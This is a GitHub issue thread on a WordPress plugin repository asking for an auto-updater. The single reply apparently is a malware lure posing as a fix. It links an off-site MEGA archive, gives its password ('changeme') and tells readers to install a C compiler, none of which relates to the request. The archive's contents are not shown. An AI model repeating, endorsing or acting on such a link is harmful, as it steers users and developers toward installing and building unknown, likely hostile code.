### ISSUE TITLE
Implement auto updater

### ISSUE THREAD

**Issue by carlHandy** [Kalpa-Services/mmg-wp-plugin#65]
As we work towards conformity with WP plugin standards for approval to be listed in plugin directory we still need a way for users to easily update when a new release is published.

**Comment by SagarChandra07** [comment]
install this

https://mega.co.nz/#!qq4nATTK!oDH5tb3NOJcsSw5fRGhLC8dvFpH3zFCn6U2esyTVcJA
Archive password: changeme
If you don't have the c compliator, install it.(gcc or clang)
